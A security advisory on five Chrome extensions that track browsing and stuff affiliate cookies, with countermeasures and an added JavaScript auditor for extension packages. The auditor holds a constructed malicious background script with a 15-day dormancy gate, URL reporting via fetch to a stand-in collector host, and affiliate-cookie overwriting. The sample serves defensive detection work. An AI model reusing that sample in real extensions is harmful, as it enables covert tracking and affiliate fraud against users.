VTA-00422 – Malicious Cookie Stuffing by Chrome Extensions
Five imposter extensions for the Google Chrome web browser, masquerading as Netflix viewers and similar tools, have been found to track users’ browsing activity and profit from retail affiliate programs. The extensions offer functions such as letting users watch Netflix shows together, applying website coupons, and taking screenshots of a website. Apart from providing that functionality, they also track the user’s browsing activity: every website visited is sent to servers owned by the extension creator, which lets the creator inject code into eCommerce websites the user visits. The injected code modifies the cookies on the site so that the extension authors receive the affiliate payment for any items purchased. The extensions also dodge detection by delaying the “attack” until 15 days after first installation.
Tactics:
Collection, Defense Evasion
Techniques:
Application Layer Protocol, Masquerading, Automated Collection, Browser Extension, System Time Discovery
Active Defense Tactics:
Active Defense Techniques:
Baseline, Network Monitoring, Software Manipulation, System Activity Monitoring
Indicator of Compromise:
SuperPRO’s Threat Countermeasures Procedures:
1. Add the IOC signatures to endpoint security protection as custom threat detection rules.
2. Always check whether the permissions a web extension requests are justified by the functionality it claims to offer.
3. Make sure the developer/publisher has a clean record.
4. Review each extension’s privacy policy and how it collects data.
5. Ensure that installed extensions are reviewed on a periodic basis.
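The behaviour described above (broad host access plus cookie permissions, URL reporting, cookie rewriting, and a 15-day dormancy gate) is something a reviewer can check for when auditing an extension's permissions and source, as countermeasures 2 and 5 recommend. The following is an added example written for this page, not code from the advisory or from the malicious extensions: a small auditor that flags the permission combination and the dormancy/cookie-writing patterns in an extension package. The manifest, the background script, the collector hostname `collector.example.invalid` and the cookie name `aff_id` are all constructed samples that model the described behaviour; they are not the real extensions' identifiers.

```javascript
// Added example for VTA-00422 (not the advisory's or the extensions' own code).
// Audits a Chrome extension manifest and background script for the
// capabilities and dormancy logic used in the described cookie-stuffing attack.

// Permissions that, together with broad host access, let an extension see every
// page visited, inject code into shop sites and rewrite affiliate cookies.
const RISKY_PERMISSIONS = new Set([
  "cookies", "webRequest", "webRequestBlocking", "scripting", "tabs", "webNavigation",
]);
const BROAD_HOSTS = ["<all_urls>", "*://*/*", "http://*/*", "https://*/*"];

// Constructed manifest for a hypothetical "watch together" extension.
const SAMPLE_MANIFEST = {
  manifest_version: 3,
  name: "Watch Party (constructed sample)",
  permissions: ["tabs", "cookies", "scripting", "storage", "alarms"],
  host_permissions: ["<all_urls>"],
  background: { service_worker: "bg.js" },
};

// Constructed background script modelling the behaviour the advisory describes:
// record the install time, stay quiet for 15 days, then report visited URLs
// and overwrite the affiliate cookie. Hostname and cookie name are made up.
const SAMPLE_BACKGROUND_SRC = `
chrome.runtime.onInstalled.addListener(() => {
  chrome.storage.local.set({ installedAt: Date.now() });
});
chrome.tabs.onUpdated.addListener(async (tabId, info, tab) => {
  const { installedAt } = await chrome.storage.local.get("installedAt");
  if (Date.now() - installedAt < 15 * 24 * 60 * 60 * 1000) return; // dormant period
  fetch("https://collector.example.invalid/visit", { method: "POST", body: tab.url });
  chrome.cookies.set({ url: tab.url, name: "aff_id", value: "attacker-tag" });
});
`;

// Flags broad host access, sensitive permissions, and the cookie+all-sites combination.
function auditManifest(manifest) {
  const findings = [];
  const perms = new Set(manifest.permissions || []);
  // MV3 keeps host patterns in host_permissions; MV2 mixes them into permissions.
  const hosts = manifest.host_permissions || manifest.permissions || [];
  const risky = [...perms].filter((p) => RISKY_PERMISSIONS.has(p));
  const broad = hosts.filter((h) => BROAD_HOSTS.includes(h));
  if (broad.length) findings.push(`broad host access: ${broad.join(", ")}`);
  if (risky.length) findings.push(`sensitive permissions: ${risky.join(", ")}`);
  if (perms.has("cookies") && broad.length) {
    findings.push("can read/write cookies on every site (cookie stuffing capable)");
  }
  return findings;
}

// Looks for an install-time gate measured in days, programmatic cookie writes,
// and tab URLs being sent to a remote host.
function auditSource(src) {
  const findings = [];
  const storesInstallTime = /onInstalled[\s\S]*?Date\.now\(\)/.test(src);
  const dayGate = src.match(/(\d+)\s*\*\s*24\s*\*\s*60\s*\*\s*60\s*\*\s*1000/);
  if (storesInstallTime && dayGate) {
    findings.push(`dormancy gate of ${dayGate[1]} days after install`);
  }
  if (/chrome\.cookies\.set\(/.test(src)) findings.push("writes cookies programmatically");
  if (/tabs\.onUpdated[\s\S]*?fetch\(/.test(src)) findings.push("reports tab URLs to a remote host");
  return findings;
}

function auditExtension(manifest, src) {
  return { manifest: auditManifest(manifest), source: auditSource(src) };
}

// Verdict: cookie access on all sites plus programmatic cookie writes plus a
// multi-day dormancy gate is the combination described in this advisory.
function isCookieStuffingCandidate(report) {
  const allSiteCookies = report.manifest.some((f) => f.includes("cookie stuffing capable"));
  const writesCookies = report.source.some((f) => f.startsWith("writes cookies"));
  const dormant = report.source.some((f) => f.startsWith("dormancy gate"));
  return allSiteCookies && writesCookies && dormant;
}

const report = auditExtension(SAMPLE_MANIFEST, SAMPLE_BACKGROUND_SRC);
console.log(JSON.stringify(report, null, 2));
console.log("cookie-stuffing candidate:", isCookieStuffingCandidate(report));
```

Run it with `node` after unpacking an extension and substituting its `manifest.json` and background script for the constructed samples. The source checks are deliberately simple pattern matches; a dormancy gate expressed through `chrome.alarms` or a server-side switch will not be caught by them, which is why the manifest review and periodic re-audit in the countermeasures above still matter.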
Contributed by: aman